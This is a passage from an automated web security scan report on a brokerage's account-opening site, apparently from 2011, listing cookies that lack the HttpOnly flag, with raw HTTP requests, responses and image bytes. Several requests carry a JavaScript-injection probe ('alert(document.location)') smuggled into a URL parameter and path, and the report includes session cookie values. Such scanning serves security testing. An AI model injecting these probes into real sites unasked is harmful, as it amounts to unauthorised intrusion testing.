HTTP/1.1 200 OK
Content-Length: 3698
Content-Type: image/gif
Last-Modified: Thu, 01 Sep 2011 04:00:28 GMT
Accept-Ranges: bytes
ETag: "1f1382af5b68cc1:e65"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=A07AAAC644F53C5E640E80A0791B83B0; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:26 GMT

GIF89a..8..@....q.k.........ZWX....r.M.E#. .........e.^...Y.R.....................@..}.w............... |...............0..P.....`..1-....LIJ?;<...............p........hef........................vstA
...[SNIP]...

10.24. https://account.optionsxpress.com/images/logos/firm/newlogo_oxb5a37alert(document.location)//18aaa9ddc45.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/logos/firm/newlogo_oxb5a37alert(document.location)//18aaa9ddc45.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/logos/firm/newlogo_oxb5a37alert(document.location)//18aaa9ddc45.gif HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 15335
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Firm=OX; expires=Fri, 09-Sep-2011 07:33:31 GMT; path=/
Set-Cookie: TLTHID=67AC9231459F78416C6C118417F2EB5D; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:31 GMT
Vary: Accept-Encoding
Connection: Keep-Alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <titl
...[SNIP]...

10.25. https://account.optionsxpress.com/images/minus_new_acct.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/minus_new_acct.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/minus_new_acct.gif HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 176
Content-Type: image/gif
Last-Modified: Mon, 20 Jun 2005 14:21:32 GMT
Accept-Ranges: bytes
ETag: "60a375ba375c51:fc8"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=82FCEE1D43C306252438F6B0E9A0C596; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=82FCEE1D43C306252438F6B0E9A0C596; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:30 GMT

GIF89a    .    ....................................................................................................!.......,....    .    .@.-`..$...(FC.V. ..h,....z..D.@T`F....0XF.Iazi.B.;

10.26. https://account.optionsxpress.com/images/newaccount/account_select1.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/newaccount/account_select1.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/newaccount/account_select1.gif HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 19995
Content-Type: image/gif
Last-Modified: Mon, 16 May 2011 14:51:10 GMT
Accept-Ranges: bytes
ETag: "d7b82ab2d813cc1:efb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=74CA95F24DB951FC9D2261975F73498E; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=74CA95F24DB951FC9D2261975F73498E; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:30 GMT

GIF89a........................................................................................................................................................................................}.........
...[SNIP]...

10.27. https://account.optionsxpress.com/images/newaccount/account_select2.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/newaccount/account_select2.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/newaccount/account_select2.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; Firm=OX; TLTHID=6BF746C24651B1BAD934E8B86A795596; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Content-Length: 8859
Content-Type: image/gif
Last-Modified: Tue, 11 May 2010 17:47:17 GMT
Accept-Ranges: bytes
ETag: "e09b2bff31f1ca1:fb9"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=57018DB34D660B4883F443A4D0B4D349; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:28 GMT

GIF89a............u..x............nK6.......................wnYG.W8..g..|.yZ.vW.......e\......[0.wdQ.........lki.]B..e......ZUN..}.............fG.xh.jI.|^................W<..l.........................
...[SNIP]...

10.28. https://account.optionsxpress.com/images/newaccount/nap_error_icon.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/newaccount/nap_error_icon.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/newaccount/nap_error_icon.png HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; Firm=OX; TLTHID=6BF746C24651B1BAD934E8B86A795596; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Content-Length: 385
Content-Type: image/png
Last-Modified: Thu, 28 Oct 2010 18:35:54 GMT
Accept-Ranges: bytes
ETag: "b848a2f4ce76cb1:efb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=2AB1B991426954C9E6064DB17C6FCAD0; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:26 GMT

.PNG
.
...IHDR.............Q(......tEXtSoftware.Adobe ImageReadyq.e<...#IDATx.b...?..01@...b....ed......$r..D......P.. . ..z..(S.R
..6>.Y......@z........n....@J.I..P.S&..O..1..'.^........@.@.a:..@
...[SNIP]...

10.29. https://account.optionsxpress.com/images/newaccount/nap_tip_icon.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/newaccount/nap_tip_icon.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/newaccount/nap_tip_icon.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; Firm=OX; TLTHID=6BF746C24651B1BAD934E8B86A795596; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Content-Length: 329
Content-Type: image/gif
Last-Modified: Tue, 11 May 2010 17:47:16 GMT
Accept-Ranges: bytes
ETag: "70e98fe31f1ca1:ef3"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=991AE206424B97B6F977F9B28BE347B2; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:27 GMT

GIF89a.............f..q..Wy.Vu.W{.T~....W|..........Z..g..X..X.Wx.Vv.......V.}.....e........_..R|...................Ny................................................................................
...[SNIP]...

10.30. https://account.optionsxpress.com/images/openAccount_bottom.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/openAccount_bottom.jpg

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/openAccount_bottom.jpg HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 892
Content-Type: image/jpeg
Last-Modified: Mon, 10 May 2010 20:56:33 GMT
Accept-Ranges: bytes
ETag: "30977b4583f0ca1:eb2"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=0E746D3A46A028879E86A893334AE28A; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=0E746D3A46A028879E86A893334AE28A; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:30 GMT

......JFIF.....d.d......Ducky..............Adobe.d.........................#....#"....."'.#!!#.''.030.'>>AA>>AAAAAAAAAAAAAAA................!....!1!!$!!1>-''''->8;333;8AA>>AAAAAAAAAAAAAAAAA...........
...[SNIP]...

10.31. https://account.optionsxpress.com/images/plus_new_acct.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/plus_new_acct.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/plus_new_acct.gif HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 178
Content-Type: image/gif
Last-Modified: Mon, 20 Jun 2005 14:21:17 GMT
Accept-Ranges: bytes
ETag: "b0e14052a375c51:fb1"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=D7A2A4EA4D6B84512DA39A9BEE64DA2F; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=D7A2A4EA4D6B84512DA39A9BEE64DA2F; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:30 GMT

GIF89a    .    ....................................................................................................!.......,....    .    .@./`..$...(BB.N. .r1..#4...@T"Q........(....B.J....;

10.32. https://account.optionsxpress.com/images/rightColumn_divider.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/rightColumn_divider.jpg

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/rightColumn_divider.jpg HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 624
Content-Type: image/jpeg
Last-Modified: Mon, 10 May 2010 20:56:06 GMT
Accept-Ranges: bytes
ETag: "40c45d3583f0ca1:fb9"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=8FAC75CE47AFCEB5B19049BC92732706; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=8FAC75CE47AFCEB5B19049BC92732706; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:30 GMT

......JFIF.....d.d......Ducky.......1.....!Adobe.d...........    .......%...n..................................................%$$$%)))))))))).    ..    
   .

........................................##"##))
...[SNIP]...

10.33. https://account.optionsxpress.com/images/styles/bubble/b.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/styles/bubble/b.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/styles/bubble/b.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; Firm=OX; TLTHID=08CFF1D64FFA1C27A2F8DA9B12382380

Response

HTTP/1.1 200 OK
Content-Length: 95
Content-Type: image/gif
Last-Modified: Tue, 25 May 2010 15:05:39 GMT
Accept-Ranges: bytes
ETag: "f0c783bc1bfcca1:ef3"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=77A51C33434FCC2754ED389A537B984E; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:49 GMT

GIF89a...........f.LLL...ccc.................................!.......,.............Ii...q
.H..;

10.34. https://account.optionsxpress.com/images/styles/bubble/bl.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/styles/bubble/bl.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/styles/bubble/bl.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; Firm=OX; TLTHID=08CFF1D64FFA1C27A2F8DA9B12382380

Response

HTTP/1.1 200 OK
Content-Length: 1197
Content-Type: image/gif
Last-Modified: Tue, 25 May 2010 15:05:39 GMT
Accept-Ranges: bytes
ETag: "50b284bc1bfcca1:fd0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=E4CCE9D34E711E38DE7ADA84B79732F8; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:49 GMT

GIF89a...........f.......MMM...............___YYY...............PPP.i....www.........qqq......}}}TTT....s................~~~JJJ...ccc..............i....u...........z"....{#..2HHH........F....j........
...[SNIP]...

10.35. https://account.optionsxpress.com/images/styles/bubble/br.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/styles/bubble/br.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/styles/bubble/br.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; Firm=OX; TLTHID=08CFF1D64FFA1C27A2F8DA9B12382380

Response

HTTP/1.1 200 OK
Content-Length: 366
Content-Type: image/gif
Last-Modified: Tue, 25 May 2010 15:05:39 GMT
Accept-Ranges: bytes
ETag: "203d84bc1bfcca1:eb2"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=956B761F4FA5D2BDCA16DB89838483FB; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:49 GMT

GIF89a
....1.....f.......ddd..................iii.................................rrr...eee.....................VVV...hhh..^.\.._.W.uN5.c    LLL|V<PPP....a.MMM...........................................
...[SNIP]...

10.36. https://account.optionsxpress.com/images/styles/bubble/l.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/styles/bubble/l.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/styles/bubble/l.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; Firm=OX; TLTHID=08CFF1D64FFA1C27A2F8DA9B12382380

Response

HTTP/1.1 200 OK
Content-Length: 54
Content-Type: image/gif
Last-Modified: Tue, 25 May 2010 15:05:39 GMT
Accept-Ranges: bytes
ETag: "f05681bc1bfcca1:fb9"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=66E456154210275BF1AD2294C24E11C3; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:50 GMT

GIF89a...........f.......!.......,.............'.....;

10.37. https://account.optionsxpress.com/images/styles/bubble/r.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/styles/bubble/r.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/styles/bubble/r.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; Firm=OX; TLTHID=08CFF1D64FFA1C27A2F8DA9B12382380

Response

HTTP/1.1 200 OK
Content-Length: 65
Content-Type: image/gif
Last-Modified: Tue, 25 May 2010 15:05:39 GMT
Accept-Ranges: bytes
ETag: "d0881bc1bfcca1:e6d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=4F0588BA4BA85289A097B6894C4CDEEB; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:50 GMT

GIF89a
..........f.............ddd...!.......,....
........aSD$.;

10.38. https://account.optionsxpress.com/images/styles/bubble/t.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/styles/bubble/t.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/styles/bubble/t.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; Firm=OX; TLTHID=08CFF1D64FFA1C27A2F8DA9B12382380

Response

HTTP/1.1 200 OK
Content-Length: 44
Content-Type: image/gif
Last-Modified: Tue, 25 May 2010 15:05:39 GMT
Accept-Ranges: bytes
ETag: "a0227ebc1bfcca1:efb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=F7D09A6D4566E6FDAE591B92DED017AF; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:51 GMT

GIF89a...........f.!.......,...........L...;

10.39. https://account.optionsxpress.com/images/styles/bubble/tl.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/styles/bubble/tl.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

